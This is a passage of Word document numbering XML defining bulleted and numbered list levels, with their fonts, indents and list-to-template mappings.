        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="D7CE7D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67F47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BEAC60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401C3B27"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0C8A5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19F25B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1242C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4D15962"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="78DE6E76"/>
    <w:lvl w:ilvl="0" w:tplc="C81EB566">
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="—"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>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4E96967"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AA04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68F1EF5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="869816CA"/>
    <w:lvl w:ilvl="0" w:tplc="BEF68D2E">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="37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1" w:tplc="827E92C8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="108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2" w:tplc="82127A70">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="180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3" w:tplc="B26C69F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="252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4" w:tplc="E6D294E8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="324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5" w:tplc="01685542">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="396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6" w:tplc="38823F38">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="468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7" w:tplc="D90EB018">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="540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8" w:tplc="326EF50A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120"/>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abstractNum>
  <w:abstractNum w:abstractNumId="48" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="48911B4F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="82067FAE"/>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48F65647"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A6F0B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9A918E9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E43EC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DC95AD6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0CDCA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06B4E1F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5E626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0EE7A01"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A7E225BA"/>
    <w:lvl w:ilvl="0" w:tplc="B3F2C2D2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="7DE65A38" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9542B350" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="9A925F88" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="7B560BBC" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="737E2D24" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0CE2BFAE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EDBA958A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="4B6E0C32" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=" "/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="6480"/>
        </w:tabs>
        <w:ind w:left="6480" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="default"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="54" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="530E7CE5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42A2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3C15889"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="97B8F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61111A9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="440A9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7413058"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BB8E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88E0A31"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E708FD0"/>
    <w:lvl w:ilvl="0" w:tplc="CA0A6A6A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="10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92E2A36">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="16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9E80EE">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="23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BC802ECC">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="30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CBC60036">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="37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63FC1218">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="45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75CE738">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="52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0CCD910">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="59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69EF4F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="66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59" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5C284478"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C25E1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CB83F70"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4AF6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CED386D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CDA61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D9851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8C57AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8830418A"/>
    <w:lvl w:ilvl="0" w:tplc="1380871A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Arial Black" w:eastAsia="Times New Roman" w:hAnsi="Arial Blac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0C9448C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D1BCB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3D5942"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EB607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48A4C0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75C20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204632"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AD4A7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5496469"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE667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6307ED0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8B8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283C60"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C8A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3A5CB5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AEC8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FE0457E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="891A2B30"/>
    <w:lvl w:ilvl="0" w:tplc="18E8BF12">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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86200864">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5922CA4C">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7A5690FA">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6344C2C4">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601692AA">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F1C0F970">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C51406DC">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90441E16">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73" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="715D59C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="879C1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18305B6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A87AB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4AB0361"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B1DCB6C6"/>
    <w:lvl w:ilvl="0" w:tplc="7FDA6060">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings 2" w:hAnsi="Wingdings 2" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="A1CC7DE2" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings 2" w:hAnsi="Wingdings 2" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="B7B074EE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings 2" w:hAnsi="Wingdings 2" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="563E2438" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings 2" w:hAnsi="Wingdings 2" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="C52E02C0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings 2" w:hAnsi="Wingdings 2" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="036478D0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings 2" w:hAnsi="Wingdings 2" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="36885C02" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings 2" w:hAnsi="Wingdings 2" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="4DF4FAA8" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings 2" w:hAnsi="Wingdings 2" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="90B25EAC"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76E75AB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDD6EA58"/>
    <w:lvl w:ilvl="0" w:tplc="EE5AAC62">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C14038F4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="657801FE" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="B47EDCF4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="146CC586" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="27566C64" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CD421B72" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="570CC40A" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="2B9422D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955E33"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="20D2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89F4F0E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B058B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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7D2A06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D462E3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2398080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F801BB8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="42B6B5D4"/>
    <w:lvl w:ilvl="0" w:tplc="2E8C0290">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="C4BCFDEA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="9CA4A7CA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="66703DE6" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2880"/>
        </w:tabs>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="2DC2DEB4" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="3600"/>
        </w:tabs>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="47E0AD82" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="4320"/>
        </w:tabs>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="CA385AF0" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5040"/>
        </w:tabs>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="260E5EFA" w:tentative="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="5760"/>
        </w:tabs>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="F4D8BE4A"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77"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="73"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="43"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="66"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="67"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="59"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="57"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="45"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="69"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="63"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="35"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="80"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="65"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="53"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="48"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="58"/>
  </w:num>
  <w:num w:numId="28">
    <w:abstractNumId w:val="72"/>
  </w:num>
  <w:num w:numId="29">
    <w:abstractNumId w:val="40"/>
  </w:num>
  <w:num w:numId="30">
    <w:abstractNumId w:val="47"/>
  </w:num>
  <w:num w:numId="31">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="32">
    <w:abstractNumId w:val="62"/>
  </w:num>
  <w:num w:numId="33">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="34">
    <w:abstractNumId w:val="46"/>
  </w:num>
  <w:num w:numId="35">
    <w:abstractNumId w:val="49"/>
  </w:num>
  <w:num w:numId="36">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="37">
    <w:abstractNumId w:val="70"/>
  </w:num>
  <w:num w:numId="38">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="39">
    <w:abstractNumId w:val="71"/>
  </w:num>
  <w:num w:numId="40">
    <w:abstractNumId w:val="74"/>
  </w:num>
  <w:num w:numId="41">
    <w:abstractNumId w:val="79"/>
  </w:num>
  <w:num w:numId="42">
    <w:abstractNumId w:val="76"/>
  </w:num>
  <w:num w:numId="43">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="44">
    <w:abstractNumId w:val="41"/>
  </w:num>
  <w:num w:numId="45">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="46">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="47">
    <w:abstractNumId w:val="15"/>
